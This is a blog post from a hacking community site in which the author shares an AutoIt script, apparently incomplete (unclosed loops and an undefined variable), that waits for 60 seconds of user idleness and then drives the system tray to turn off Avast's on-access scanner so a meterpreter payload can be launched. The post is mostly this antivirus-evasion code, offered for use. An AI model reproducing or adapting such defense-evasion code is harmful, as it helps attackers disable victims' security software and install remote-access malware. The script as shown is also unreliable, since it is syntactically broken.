After a 4 part investigation / introduction “I was working on tutorials” to bypassing anti-virus, an update to the target product slapped me in the face, halting the mechanisms I had used for circumvention, I needed to find a solution that would allow me to continue with my deployment of meterpreter and Avast_OFF is what I came up with.

I was looking for some-way, any-way to bypass the product in question just to see how easy it was with today's tools, I had seen AutoIT used in the past and it offered everything I needed “an easy way to program GUI interaction without learning to program” most applications are designed to interact with the end user and anti-virus products are no different so using AutoIT to mimic the users actions should work? so-long as the anti-virus product allows us to execute and the user behaved as expected the result was the same! “my payload is delivered and I get the shell I'm really after.

[The script]
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=..\..\..\..\Program Files\AutoIt3\Icons\filetype-blank.ico
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "SysTray_UDF.au3"
Global $iIdleTime = _Timer_GetIdleTime()
; Wait for 60 seconds of inactivity.
While $iIdleTime < "60000"
Global $iIdleTime = _Timer_GetIdleTime()
MsgBox(0,"I Think were alone","if you left me longer than 60 second your in for it [" & $iIdleTime & "]",2,0);
$class = "classname=Shell_TrayWnd"
$hControl = ControlGetHandle($class, "", "Button1")
; get tray position and move there.
$posTray = WinGetPos(_FindTrayToolbarWindow())
MouseMove($posTray[0], $posTray[1])
; If XP Hide Inactive Icons mode is active
If $hControl <> "" And ControlCommand($class, "", $hControl, "IsVisible","") Then
ControlClick($class, "", $hControl)
$index = _SysTrayIconIndex($ApplicationX)
If $index <> -1 Then
$pos = _SysTrayIconPos($index)
If $pos = -1 Then
MsgBox(0,"Not Found",$ApplicationX,30,0)
MouseMove($pos[0], $pos[1])
If Not WinActive("avast! On-Access Scanner","") Then WinActivate("avast! On-Access Scanner","")
WinWaitActive("avast! On-Access Scanner","")
MsgBox(0,"so far so good!","with any luck AV is now off and the payload is about to be launched",4,0)

There is nothing new in this information it was just an exercise for my-self, but this is my only blog so I have posted the code here.

Views: 158


You need to be a member of Dissecting The Hack to add comments!

Join Dissecting The Hack

Latest Activity

Anton Vyacheslav is now a member of Dissecting The Hack
Dec 9, 2018
bernardorichard updated their profile
Nov 28, 2018
Sam Mccalla is now a member of Dissecting The Hack
Nov 19, 2018
bernardorichard is now a member of Dissecting The Hack
Oct 24, 2018

Stratagem 13 News Feed

© 2020   Created by Marcus J. Carey.   Powered by

Badges  |  Report an Issue  |  Terms of Service